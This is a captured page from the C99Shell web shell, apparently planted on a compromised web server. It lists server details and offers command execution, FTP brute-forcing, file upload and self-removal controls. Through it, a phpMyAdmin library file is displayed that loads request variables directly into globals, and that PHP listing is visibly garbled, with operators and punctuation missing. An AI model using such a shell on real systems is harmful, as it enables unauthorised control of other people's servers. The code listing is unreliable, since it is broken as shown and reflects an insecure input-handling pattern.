!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/makras/public_html/db_admin/libraries/   drwxr-xr-x
Free 318.36 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     grab_globals.lib.php (1.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: grab_globals.lib.php,v 2.4 2003/11/26 22:52:23 rabus Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:


/**
 * This library grabs the names and values of the variables sent or posted to a
 * script in the $_* arrays and sets simple globals variables from them. It does
 * the same work for the $PHP_SELF, $HTTP_ACCEPT_LANGUAGE and
 * $HTTP_AUTHORIZATION variables.
 *
 * loic1 - 2001/25/11: use the new globals arrays defined with php 4.1+
 */

function PMA_gpc_extract($array, &$target) {
    if (!
is_array($array)) {
        return 
FALSE;
    }
    
$is_magic_quotes get_magic_quotes_gpc();
    foreach(
$array AS $key => $value) {
        if (
is_array($value)) {
            
// there could be a variable coming from a cookie of
            // another application, with the same name as this array
            
unset($target[$key]);

            
PMA_gpc_extract($value$target[$key]);
        } else if (
$is_magic_quotes) {
            
$target[$key] = stripslashes($value);
        } else {
            
$target[$key] = $value;
        }
    }
    return 
TRUE;
}

if (!empty(
$_GET)) {
    
PMA_gpc_extract($_GET$GLOBALS);
// end if

if (!empty($_POST)) {
    
PMA_gpc_extract($_POST$GLOBALS);
// end if

if (!empty($_FILES)) {
    foreach(
$_FILES AS $name => $value) {
        $
$name $value['tmp_name'];
        ${
$name '_name'} = $value['name'];
    }
// end if

if (!empty($_SERVER)) {
    
$server_vars = array('PHP_SELF''HTTP_ACCEPT_LANGUAGE''HTTP_AUTHORIZATION');
    foreach (
$server_vars as $current) {
        if (isset(
$_SERVER[$current])) {
            $
$current $_SERVER[$current];
        } elseif (!isset($
$current)) {
            $
$current '';
        }
    }
    unset(
$server_vars$current);
// end if

// Security fix: disallow accessing serious server files via "?goto="
if (isset($goto) && strpos(' ' $goto'/') > && substr($goto02) != './') {
    unset(
$goto);
// end if

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0206 ]--